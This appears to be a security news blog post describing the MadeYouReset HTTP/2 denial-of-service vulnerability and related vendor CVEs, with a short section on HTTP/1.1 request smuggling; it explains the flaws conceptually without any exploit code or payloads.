MadeYouReset Vulnerability

Cyber Events
Written By Benjamin Britcliffe

HTTP/2 Must Die

Multiple HTTP/2 implementations have been found susceptible to a new attack technique called MadeYouReset that could be explored to conduct powerful denial-of-service (DoS) attacks.

"MadeYouReset bypasses the typical server-imposed limit of 100 concurrent HTTP/2 requests per TCP connection from a client. This limit is intended to mitigate DoS attacks by restricting the number of simultaneous requests a client can send," researchers Gal Bar Nahum, Anat Bremler-Barr, and Yaniv Harel said.

With MadeYouReset, an attacker can send many thousands of requests, creating a denial-of-service condition for legitimate users and, in some vendor implementations, escalating into out-of-memory crashes.

The vulnerability has been assigned the generic CVE identifier, CVE-2025-8671, although the issue impacts several products, including:

  • Apache Tomcat (CVE-2025-48989)

  • F5 BIG-IP (CVE-2025-54500)

  • Netty (CVE-2025-55163)

MadeYouReset is the latest flaw in HTTP/2 after Rapid Reset (CVE-2023-44487) and HTTP/2 CONTINUATION Flood that can be potentially weaponized to stage large-scale DoS attacks.

Just like how the other two attacks leverage the RST_STREAM frame and CONTINUATION frames, respectively, in the HTTP/2 protocol to pull off the attack, MadeYouReset builds upon Rapid Reset and its mitigation, which limits the number of streams a client can cancel using RST_STREAM.

HTTP/1.1 Must Die

HTTP request smuggling is a security exploit affecting the application layer protocol that abuses the inconsistency in parsing non-RFC-compliant HTTP requests by front-end and back-end servers, permitting an attacker to "smuggle" a request and sidestep security measures.

"HTTP/1.1 has a fatal flaw: Attackers can create extreme ambiguity about where one request ends, and the next request starts," PortSwigger's James Kettle said. "HTTP/2+ eliminates this ambiguity, making desync attacks virtually impossible. However, simply enabling HTTP/2 on your edge server is insufficient – it must be used for the upstream connection between your reverse proxy and origin server."

CVE Reference List

  • CVE-2025-8671: Generic identifier for MadeYouReset vulnerability.

  • CVE-2025-48989: Apache Tomcat implementation impact.

  • CVE-2025-54500: F5 BIG-IP implementation impact.

  • CVE-2025-55163: Netty implementation impact.

  • CVE-2025-32094: Related vulnerability reference.

  • CVE-2025-4366: Related vulnerability reference.

Table of CVE IDs and associated vendors provided for tracking security patches.

Benjamin Britcliffe
Previous

OAuth Redirect URI Abuse Flow
Next

Cyber Security Statistics